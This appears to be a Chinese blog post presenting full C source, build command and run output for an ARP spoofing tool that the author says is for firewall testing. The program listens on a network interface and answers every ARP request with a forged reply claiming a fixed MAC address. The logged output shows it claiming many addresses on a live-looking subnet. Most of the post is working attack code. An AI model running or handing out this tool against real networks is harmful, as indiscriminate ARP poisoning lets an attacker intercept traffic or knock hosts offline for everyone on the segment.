做这个工具的目的不是为了搞破坏,只是为了做防火墙测试。
由于需要模拟生产数据包,因此需要自己动手写ARP欺骗程序来回应防火墙的ARP询问。
这个程序会一直监听某个网卡,一收到ARP询问就通过rawsocket构造一个ARP回应包发送出去。
本程序有两个部分,一个是收包,基于libpcap;另一个是发包,不依赖任何第三方类库,直接通过rawsocket从链路层开始构造ARP包发出去。
#include <pcap.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/ether.h>
#include <netpacket/packet.h>
#pragma pack(1)
unsigned char p_src_addr[15]; //src_ip buffer
unsigned char p_dst_addr[15]; //dst_ip buffer
unsigned char p_dst_mac[17]; //dst_mac buffer
unsigned char* p_src_mac = "AA:BB:CC:DD:EE:FF"; //defined mac
unsigned char* p_interface; //interface pointer
unsigned char buffer[8192]; //rawsocket data buffer
int s = -1; //socket handler
struct sockaddr_ll sa;
int offset = 0; //rawsocket data offset
u_int16_t handle_ethernet(u_char *args, const struct pcap_pkthdr* pkthdr, const u_char* packet)
{
struct ether_header *eptr; /* net/ethernet.h */
eptr = (struct ether_header *) packet;
return ntohs(eptr->ether_type);
}
struct myarphdr
{
unsigned short hw_type; /* hardware address */
unsigned short protocol_type; /* protocol address */
unsigned char hw_addr_len; /* length of hardware address */
unsigned char protocol_addr_len; /* length of protocol address */
unsigned short opcode; /*operate code 1 ask 2 reply*/
unsigned char src_mac[6];
struct in_addr src_ip;
unsigned char dst_mac[6];
struct in_addr dst_ip;
unsigned char padding[18];
};
int setup_eth_header(unsigned char* buffer, unsigned char* src_mac, unsigned char* dst_mac)
{
char s_mac[6];
sscanf(src_mac, "%x:%x:%x:%x:%x:%x", &s_mac[0], &s_mac[1], &s_mac[2], &s_mac[3], &s_mac[4], &s_mac[5]);
char d_mac[6];
sscanf(dst_mac, "%x:%x:%x:%x:%x:%x", &d_mac[0], &d_mac[1], &d_mac[2], &d_mac[3], &d_mac[4], &d_mac[5]);
struct ethhdr ethernet_header;
memcpy(ethernet_header.h_dest, d_mac, 6);
memcpy(ethernet_header.h_source, s_mac, 6);
ethernet_header.h_proto = htons(0x0806);
memcpy(buffer, ðernet_header, sizeof(struct ethhdr));
return sizeof(struct ethhdr);
};
int setup_arp_header(unsigned char* buffer, unsigned char* src_mac, unsigned char* dst_mac, unsigned char* src_address, unsigned char* dst_address){
char s_mac[6];
sscanf(src_mac, "%x:%x:%x:%x:%x:%x", &s_mac[0], &s_mac[1], &s_mac[2], &s_mac[3], &s_mac[4], &s_mac[5]);
char d_mac[6];
sscanf(dst_mac, "%x:%x:%x:%x:%x:%x", &d_mac[0], &d_mac[1], &d_mac[2], &d_mac[3], &d_mac[4], &d_mac[5]);
struct myarphdr arp_header;
arp_header.hw_type = htons(0x0001);
arp_header.protocol_type = htons(0x0800);
arp_header.hw_addr_len = (unsigned char)6;
arp_header.protocol_addr_len = (unsigned char)4;
arp_header.opcode = htons(0x0002);
memcpy(arp_header.src_mac, s_mac, 6);
arp_header.src_ip.s_addr = inet_addr(src_address);
memcpy(arp_header.dst_mac, d_mac, 6);
arp_header.dst_ip.s_addr = inet_addr(dst_address);
memset(arp_header.padding,0 , 18);
memcpy(buffer, &arp_header, sizeof(struct myarphdr));
return sizeof(struct myarphdr);
}
u_char* handle_arp(u_char *args,const struct pcap_pkthdr* pkthdr,const u_char* packet)
{
struct ether_header *eptr;
struct myarphdr *arp;
u_int length = pkthdr->len;
eptr = (struct ether_header*)packet;
arp = (struct myarphdr*)(packet + sizeof(struct ether_header));
length -= sizeof(struct ether_header);
if (length < sizeof(struct myarphdr))
{
printf("<somebody has replied!src_mac:%s ",ether_ntoa((const struct ether_addr *)&eptr->ether_shost));
printf("dst_mac:%s\n", ether_ntoa((const struct ether_addr *)&eptr->ether_dhost));
return NULL;
}
if(htons(arp->opcode) == 2){//arp reply
return NULL;
}
memset(p_dst_mac, 0, sizeof(p_dst_mac));
memcpy(p_dst_mac, ether_ntoa((const struct ether_addr *)&eptr->ether_shost), sizeof(p_dst_mac));
memset(p_src_addr, 0, sizeof(p_src_addr));
memset(p_dst_addr, 0, sizeof(p_dst_addr));
memcpy(p_src_addr, inet_ntoa(arp->dst_ip), sizeof(p_src_addr));
memcpy(p_dst_addr, inet_ntoa(arp->src_ip), sizeof(p_dst_addr));
if(s < 0){
s = socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
if(s < 0){
printf("Could not open raw socket.\n");
exit(-1);
}
}
memset(buffer, 0 ,sizeof(buffer));
offset = 0;
sa.sll_ifindex = if_nametoindex(p_interface);
offset = setup_eth_header(buffer, p_src_mac, p_dst_mac);
offset += setup_arp_header(buffer + offset, p_src_mac, p_dst_mac, p_src_addr, p_dst_addr);
if(sendto(s, buffer, offset, 0, (struct sockaddr *) &sa, sizeof(sa)) < 0){
printf("arp send error!\n");
exit(-1);
}else{
printf("[ARP]inter:%s src_mac:%s dsc_mac:%s src_ip:%s dst_ip:%s\n", p_interface, p_src_mac, p_dst_mac, p_src_addr, p_dst_addr);
}
return NULL;
}
void my_callback(u_char *args,const struct pcap_pkthdr* pkthdr,const u_char* packet){
u_int16_t type = handle_ethernet(args, pkthdr, packet);
if(type == ETHERTYPE_ARP){
handle_arp(args,pkthdr,packet);
}
}
int main (int argc, char* argv[]){
if(argc < 2){
printf("usaged:%s interface\n", argv[0]);
return 0;
}
p_interface = argv[1];
char ebuf[PCAP_ERRBUF_SIZE];
/*create capture handler of libpcap*/
pcap_t *pd = pcap_open_live (argv[1], BUFSIZ, 1, -1, ebuf);
/*start the loop of capture, loop 5 times, enter printer when capted*/
pcap_loop (pd, -1, my_callback, NULL);
pcap_close (pd);
if(s > 0){
close(s);
}
return 0;
}
编译后执行:
[root@cnszxxxx xxxx]# gcc -o arp_trick arp_trick.c -lpcap
执行效果如下:
[root@cnszxxxx xxxx]# ./arp_trick eth0 [ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:46:c9 src_ip:10.11.77.200 dst_ip:10.11.77.60 somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:1d:9:9:bd:53 [ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:52:29 src_ip:10.11.77.200 dst_ip:10.11.77.79 somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:50:56:83:2b:cd [ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:f:1f:69:7b:fa src_ip:10.11.77.43 dst_ip:10.11.77.108 [ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:f:1f:69:7b:fa src_ip:10.11.77.56 dst_ip:10.11.77.108 [ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:16:1c src_ip:10.11.77.40 dst_ip:10.11.77.41 somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:50:56:83:16:1c [ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:1d:9:9:bd:53 src_ip:10.11.77.61 dst_ip:10.11.77.62 [ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:1d:9:9:bd:53 src_ip:10.11.77.40 dst_ip:10.11.77.62 somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:1d:9:9:bd:53
本文介绍了一个用于防火墙测试的ARP欺骗程序。该程序监听指定网卡上的ARP请求,并构造响应包进行回复。通过模拟生产数据包的方式,帮助测试防火墙对ARP攻击的防御能力。
2862





